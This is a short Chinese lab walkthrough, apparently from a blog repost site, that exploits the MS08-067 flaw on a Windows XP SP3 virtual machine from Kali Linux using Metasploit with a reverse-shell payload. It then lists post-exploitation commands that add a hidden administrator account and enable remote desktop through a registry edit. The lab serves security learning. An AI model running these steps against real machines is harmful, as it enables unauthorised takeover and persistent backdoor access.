admin管理员组文章数量:1594115
#windowsxpsp3系统MS08-067漏洞测试
漏洞描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码,在Windows 2000、Windows server 2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。
实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134
攻击过程
先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活
进入metasploit框架
Msfconsole
搜索漏洞
Search ms08-067选择一个攻击模块
查看配置信息并设置
设置要攻击的目标主机ip
设置自己的ip地址,用于目标机器反弹shell
设置payload 用于反弹shell,这里是windows的
开始攻击
Expolit/run
一些命令
后渗透利用
Getuid
Shell
net user ouyang 123456 /add
net localgroup administrators ouyang /add
创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
查看机器是否打开了3389
远程桌面连接
链接成功
获取完信息之后删除用户
版权声明:本文标题:#windowsxpsp3系统MS08-067漏洞测试 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1728184881a1148697.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论